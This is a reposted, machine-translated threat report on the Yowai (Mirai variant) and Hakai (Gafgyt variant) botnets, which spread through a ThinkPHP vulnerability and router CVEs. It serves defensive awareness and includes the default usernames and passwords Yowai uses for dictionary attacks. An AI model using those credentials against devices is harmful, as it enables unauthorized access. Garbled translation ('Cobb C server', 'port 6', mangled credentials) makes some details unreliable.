Shulou(Shulou.com)06/01 Report--

Based on the example analysis of botnet Hakai and Yowai that abuse ThinkPHP vulnerabilities, it is believed that many inexperienced people are at a loss about this. Therefore, this article summarizes the causes and solutions of the problem. Through this article, I hope you can solve this problem.

Preface

Cyber criminals are using a ThinkPHP vulnerability discovered and patched in December 2018 to spread two botnet viruses, Yowai (Mirai variant) and Hakai (Gafgyt variant).

Cyber criminals use dictionary attacks to destroy Web servers that create websites using the PHP framework and gain control of these routers to achieve distributed denial of service (DDoS) attacks.

Yowai

Yowai (BACKDOOR.LINUX.YOWAI.A, detected by trend Technology) has a configuration table similar to other Mirai variants. Its configuration table uses the same process to decrypt and adds ThinkPHP exploits to the infection list.

Yowai listens on port 6 to receive commands from the Cobb C server. After infecting the router, it uses dictionary attacks to try to infect other devices. The affected routers are now part of the botnet, enabling their operators to launch DDoS attacks using the affected devices.

Yowai takes advantage of many other vulnerabilities to complement dictionary attacks, which displays a message on the user's console after execution. The analysis found that it also contains a list of competing botnets, which will be removed from the system.

Dictionary attack username / password contention botnet list OxhlwSG8

DefaulttlJwpbo6S2fGqNFsadmin

Daemon

12345

Guest

Support

4321

Root

Vizxv

T0talc0ntr0l4!

Bin

Adm

Synnetdvrhelper, mirai, light, apex, Tsunami, hoho, nikki, miori, hybrid, sora, yakuza, kalon, owari, gemini, lessie, senpai, apollo, storm, Voltage, horizon, meraki, Cayosin, Mafia, Helios, Sentinel, Furasshu, love, oblivion, lzrd, yagi, dark, blade, messiah, qbot, modz, ethereal, unix, execution, galaxy, kwari, okane, osiris, naku, demon, sythe, xova, tsunami, trinity, BUSHIDO, IZ1H9, daddyl33t, KOWAI-SAD, ggtr, QBotBladeSPOOKY, SO190Ij1X, hellsgate, sysupdater, Katrina32

Table 1. List of default usernames and passwords used by Yowai for dictionary attacks and the list of competitive botnets removed from the system

In addition to ThinkPHP vulnerabilities, Yowai also exploits the following vulnerabilities: CVE-2014-8361, a Linksys RCE,CVE-2018-10561, CCTVMurDVR RCE.

Hakai

Gafgytd variant Hakai (BACKDOOR.LINUX.HAKAI.AA, detected by trend Technology) botnet virus infects IoT devices and relies on router vulnerabilities to spread.

Interestingly, the sample of Hakai contains code copied from Mirai, especially the functions used to encrypt its configuration table. However, this function cannot be run, and it is suspected that the code of the telnet dictionary attack was deliberately deleted to make Hakai more covert.

Because variants of Mirai usually kill competing botnets, Hakai has a survival advantage by avoiding attacks on IoT devices with default passwords. Compared with brute force cracking telnet, the method of vulnerability propagation alone is more difficult to detect.

Conclusion

Since ThinkPHP is a free and open source PHP framework, it is welcomed by developers and companies because of its simplified functions and ease of use, and it is easy to be abused by malicious programs such as Hakai and Yowai, thus destroying Web servers and attacking websites. As more botnet code can be obtained and exchanged online, it can be predicted that competing botnets have similar code.

In addition, cyber criminals will continue to study botnets like Mirai, develop more Mirai variants, and increase the adaptability of malware to attack more and more IoT devices that use default passwords. Users of the Internet of things should update the firmware of their devices to the latest version released by the manufacturer to fix the vulnerability. Users should also update the device password frequently to prevent unauthorized logins.

After reading the above, have you mastered the method of analyzing the examples of botnets Hakai and Yowai that abuse ThinkPHP vulnerabilities? If you want to learn more skills or want to know more about it, you are welcome to follow the industry information channel, thank you for reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.